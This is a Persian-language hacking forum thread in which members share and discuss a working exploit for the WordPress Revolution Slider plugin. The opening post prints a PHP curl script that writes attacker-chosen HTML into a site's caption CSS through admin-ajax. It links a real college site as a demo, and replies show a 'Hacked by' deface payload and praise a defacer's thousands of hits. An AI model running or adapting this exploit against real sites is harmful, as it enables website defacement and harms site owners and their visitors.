SpareNet Servers Advertising & Link Exchange

اطلاعیه

بستن
هیچ اطلاعیه ای هنوز ایجاد نشده است .

Wordpress Plugin Revolution Slider - Unrestricted File Upload

بستن
X
 
  • فیلتر
  • زمان
  • نمایش
پاک کردن همه
نوشته‌های جدید

  • Wordpress Plugin Revolution Slider - Unrestricted File Upload

    همانطور که شاهد بودید پلاگین revslider چندی قبل آسیب پذیری از نوع LFD داشت و در ابتدای سال جدید آسیب پذیری دیگری از این پلاگین منتشر شد .

    کد:
    ######################################################################
    # Exploit Title: Wordpress Plugin Revolution Slider - Unrestricted File Upload
    # Google Dork: Y0ur Brain
    # Date: 27.03.2015
    # Exploit Author: CrashBandicot (@DosPerl)
    # Vendor HomePage: http://revolution.themepunch.com/
    # Version: old
    # Tested on: Windows
    ######################################################################
     
     
    # Path of File : /wp-content/plugins/revslider/revslider_admin.php
    # Vulnerable File : revslider_admin.php
     
    232.    $action = self::getPostGetVar("client_action");
    233.    $data = self::getPostGetVar("data");
    ...
    301.    case "get_captions_css":
    302.     $contentCSS = $operations->getCaptionsContent();
    303.      self::ajaxResponseData($contentCSS);
    ...
    305.    case "update_captions_css":
    306.      $arrCaptions = $operations->updateCaptionsContentData($data);
    307.      self::ajaxResponseSuccess("CSS file saved succesfully!",array("arrCaptions"=>$arrCaptions));
     
     
    # Exploit :
     
    <?php
     
    $post = array
    (
    "action" => "revslider_ajax_action",
    "client_action" => "update_captions_css",
    "data" => "<marquee>Malicious Code Here</marquee>"
    );
     
    $ch = curl_init ("http://localhost/wp-admin/admin-ajax.php");
    curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
    curl_setopt ($ch, CURLOPT_FOLLOWLOCATION, 1);
    curl_setopt ($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
    curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, 5);
    curl_setopt ($ch, CURLOPT_SSL_VERIFYPEER, 0);
    curl_setopt ($ch, CURLOPT_SSL_VERIFYHOST, 0);
    curl_setopt ($ch, CURLOPT_POST, 1);
    curl_setopt ($ch, CURLOPT_POSTFIELDS, $post);
    $data = curl_exec ($ch);
    curl_close ($ch);
     
    ?>
     
     
    # Path of Result : /wp-admin/admin-ajax.php?action=revslider_ajax_action&client_action=get_captions_css
    با استفاده از این آسیب پذیری میتوانید از طریق ajax درخواست خود را به صورت HTML ارسال نمایید که در نهایت منجر به قرار گرفتن صفحه شما میشود . توی بررسی هایی که داشتیم به دلیل قرار گرفتن کد ارسالی در آرایه امکان اجرای کد های PHP یا JAVA وجود ندارد و تنها حسن این آسیب پذیری میتوان به قرار دادن صفحه HTML اشاره نمود . خوب این روزها هم zone-h پر شده از دیفیسرهایی که به واسطه این آسیب پذیری مشغول دیفیس هستند [img]images/smilies/Smileys/10.gif[/img]

    برای اینکار میتوانید از طریق کد زیر یک درخواست از طریق ajax به سمت هدف خود ارسال نمایید :

    کد:
    <?php
     
    $post = array
    (
    "action" => "revslider_ajax_action",
    "client_action" => "update_captions_css",
    "data" => "<marquee>IRH</marquee>"
    );
     
    $ch = curl_init ("http://localhost/wp-admin/admin-ajax.php");
    curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
    curl_setopt ($ch, CURLOPT_FOLLOWLOCATION, 1);
    curl_setopt ($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
    curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, 5);
    curl_setopt ($ch, CURLOPT_SSL_VERIFYPEER, 0);
    curl_setopt ($ch, CURLOPT_SSL_VERIFYHOST, 0);
    curl_setopt ($ch, CURLOPT_POST, 1);
    curl_setopt ($ch, CURLOPT_POSTFIELDS, $post);
    $data = curl_exec ($ch);
    curl_close ($ch);
     
    ?>
    نتیجه درخواست خود را میتوانید در پیوند زیر مشاهده نمایید :

    کد:
    /wp-admin/admin-ajax.php?action=revslider_ajax_action&client_action=get_captions_css
    این هم یک دمو

    http://www.gaeliccollege.edu//wp-admin/admin-ajax.php?action=revslider_ajax_action&client_actio n=get_captions_css
     
    [align=center][/align]

  • #2
    RE: Wordpress Plugin Revolution Slider - Unrestricted File Upload

    تشکر از پست ولی نظر شخصی من اینه این چیزا مثل vbseo میمونه اکسپلویتش رو چند هفته قبل داشتم ولی تا باگی رو خود ادم پیدا نکنه بهش نمیچسبه

    در مورد دمو MuhmadEmadکه داره دیفیس میکنه تا قبل این باگ ایشون حدود 200 دیفیس بیشتر نداشت و الان رسیده به 12 13 هزار

    کپی پیس بیش نیس  حرکت MuhmadEmad [img]images/smilies/Smileys/8.gif[/img]MuhmadEmad

    نظر


    • #3
      RE: Wordpress Plugin Revolution Slider - Unrestricted File Upload

      بله فقط به درد دیفیسر ها میخوره ، اما گفتنش خالی از لطف نبود .

      کد:
      {"success":true,"message":"","data":"<body style='color: transparent;background-color: black'><center><h1><b style='color: white'>Hacked by Hacker <br><p style='color: transparent'>"}
      دیتای ارسالی در آرایه قرار میگیره و توان انتقال php یا حتی کد جاوا وجود نداره اگر جاوا اسکریپت هم support میکرد میتونستیم با کمی مهندسی اجتماعی کوکی های ادمین را بگیریم .

      در مورد نظرتون هم تشکر ، سعی میکنیم آسیب پذیری های جدید بزاریم .
      [align=center][/align]

      نظر


      • #4
        RE: Wordpress Plugin Revolution Slider - Unrestricted File Upload

        میشه کمی واضح تر توضیح بدین در این مورد؟
        نحوه ارسال درخاست  رو میگم......

        نظر


        • #5
          RE: Wordpress Plugin Revolution Slider - Unrestricted File Upload

          شما باید یک درخواست ارسال کنید کافی هست کد اکسپلویت رو اجرا کنید تا درخواست اعمال بشه ، کد رو دقیق چک نکردم فقط درخواست از نوع ajax هست و شما میتونی متن یا html را درون آرایه انتقال بدی ، زیادم high نیست فقط به درد دیفیسر ها میخوره . اگر فکر میکنید نیاز هست براتون کامل تر باز کنیم .
          [align=center][/align]

          نظر

          صبر کنید ..
          X